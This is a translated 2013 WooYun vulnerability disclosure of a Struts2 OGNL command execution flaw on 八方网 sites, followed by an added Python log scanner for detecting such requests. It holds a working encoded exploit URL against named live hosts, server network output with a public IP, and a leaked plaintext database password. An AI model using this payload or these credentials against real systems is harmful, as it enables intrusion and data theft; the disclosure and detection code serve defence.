Vulnerability summary

Vulnerability ID: wooyun-2013-033204

Title: Struts2 command execution vulnerability on a 八方网 (Bafangwang) site

Vendor: 八方网 (Bafangwang)

Author: 曹操

Submitted: 2013-08-02 13:47

Fix deadline: 2013-09-16 13:48

Published: 2013-09-16 13:48

Type: command execution

Severity: high

Self-rated Rank: 20

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2013-08-02: Actively contacting the vendor and waiting for the vendor to claim the report; details not made public
2013-09-16: The vendor has actively ignored the vulnerability; details are now public

Brief description:

As the title says.
I found it has already been exploited widely; everyone, please go easy!

Details:

http://www.bafangwang.com/cat.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D
A quick search online shows that the following domains are all hosted on the same server, so patch it quickly!
At the same time, check the server and clean out the shells under the web directory.
http://www.bafangwang.com/cat.do
http://sso.bafangwang.com/security.action
http://bengbu.bafangwang.com/cat.do
http://chongqing.bafangwang.com/cat.do
http://hangzhou.bafangwang.com/yqlj.do
http://jinhua.bafangwang.com/storeDetail.do
http://2fwww.bafangwang.com/info_issuance/infoDetail.do
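The request above reaches the server as a query-string parameter whose name starts with the Struts2 action-mapper prefix redirect: followed by an OGNL expression (${...}); that shape is what a defender can look for in web access logs while patching. The following log scanner is an added example written for this page, not code from the report or from 八方网; the access-log lines, IP addresses and timestamps in it are constructed, and the marker list is taken only from the payload shown above.

```python
"""Flag Struts2 redirect:/redirectAction: OGNL-prefix requests in access logs.
Added detection example; not part of the original WooYun report."""
import re
from urllib.parse import unquote

# Constructed sample lines in Apache/nginx combined log format. Clients,
# timestamps and sizes are made up; the second query string reuses the
# prefix shape of the payload in the report (truncated to its first call).
SAMPLE_LOG = r'''
10.0.0.5 - - [02/Aug/2013:13:40:01 +0800] "GET /cat.do?id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [02/Aug/2013:13:41:17 +0800] "GET /cat.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%7D HTTP/1.1" 302 0 "-" "curl/7.30"
10.0.0.9 - - [02/Aug/2013:13:42:03 +0800] "GET /security.action?redirectAction%3A%24%7B%23a%3D1%7D HTTP/1.1" 200 12 "-" "curl/7.30"
10.0.0.7 - - [02/Aug/2013:13:43:55 +0800] "POST /storeDetail.do HTTP/1.1" 200 900 "-" "Mozilla/5.0"
'''

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Action-mapper prefixes that, in the affected Struts2 versions, evaluated
# their argument as OGNL, followed by an expression opener ${ or %{.
PREFIX_RE = re.compile(r'(?i)\b(redirect|redirectAction)\s*:\s*[$%]\{')

# Substrings present in the report's payload; any hit raises the severity.
OGNL_MARKERS = ('#context', 'com.opensymphony.xwork2.dispatcher',
                'getRealPath', 'getWriter')


def decode_target(target: str) -> str:
    """URL-decode up to three times so double-encoded payloads normalise too."""
    prev, cur = None, target
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    return cur


def analyse_line(line: str):
    """Return a finding dict for a suspicious request line, or None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    decoded = decode_target(m.group('target'))
    path, _, query = decoded.partition('?')
    prefix = PREFIX_RE.search(query)
    if not prefix:
        return None
    markers = [k for k in OGNL_MARKERS if k in query]
    return {
        'method': m.group('method'),
        'path': path,
        'prefix': prefix.group(1),
        'markers': markers,
        # A prefix alone is worth a look; known payload markers make it high.
        'severity': 'high' if markers else 'medium',
    }


def scan(log_text: str):
    """Scan every line of a log and return the list of findings."""
    return [f for f in (analyse_line(l) for l in log_text.splitlines()) if f]


if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Scanning the decoded query string rather than the raw one matters because the payload on this page is fully percent-encoded; matching on the raw line would miss it. A benign redirect=/home parameter is not flagged, since the rule requires the colon prefix followed by an expression opener.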

Proof of vulnerability:

[Screenshot: 八方网.PNG]


eth1 Link encap:Ethernet HWaddr 00:15:17:88:CB:2D
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:19 Memory:b8800000-b8820000
eth2 Link encap:Ethernet HWaddr 00:15:17:88:CB:2C
inet addr:121.52.210.177 Bcast:121.52.210.255 Mask:255.255.255.0
inet6 addr: fe80::215:17ff:fe88:cb2c/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:487582321 errors:139 dropped:0 overruns:0 frame:93
TX packets:462349471 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:87493367650 (81.4 GiB) TX bytes:361000438471 (336.2 GiB)
Interrupt:18 Memory:b8820000-b8840000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:693417818 errors:0 dropped:0 overruns:0 frame:0
TX packets:693417818 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1216582809504 (1.1 TiB) TX bytes:1216582809504 (1.1 TiB)
/dev/mapper/VolGroup-lv_root
50G 8.5G 39G 18% /
tmpfs 4.0G 0 4.0G 0% /dev/shm
/dev/sda1 485M 38M 422M 9% /boot
/dev/mapper/VolGroup-lv_home
402G 83G 299G 22% /home
<property name="driverClass" value="com.mysql.jdbc.Driver" />
<property name="jdbcUrl" value="jdbc:mysql://localhost/bfw_root?useUnicode=true&amp;characterEncoding=utf8" />
<property name="user" value="bfw" />
<property name="password" value="i2GYSDHANESpoLrQ1kW6uwQC" />

Fix recommendation:

Apply the Struts2 patch, check the Linux host for backdoors, and delete the shells under the web directory.

Copyright notice: please credit the source when reposting: 曹操@乌云


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively refused.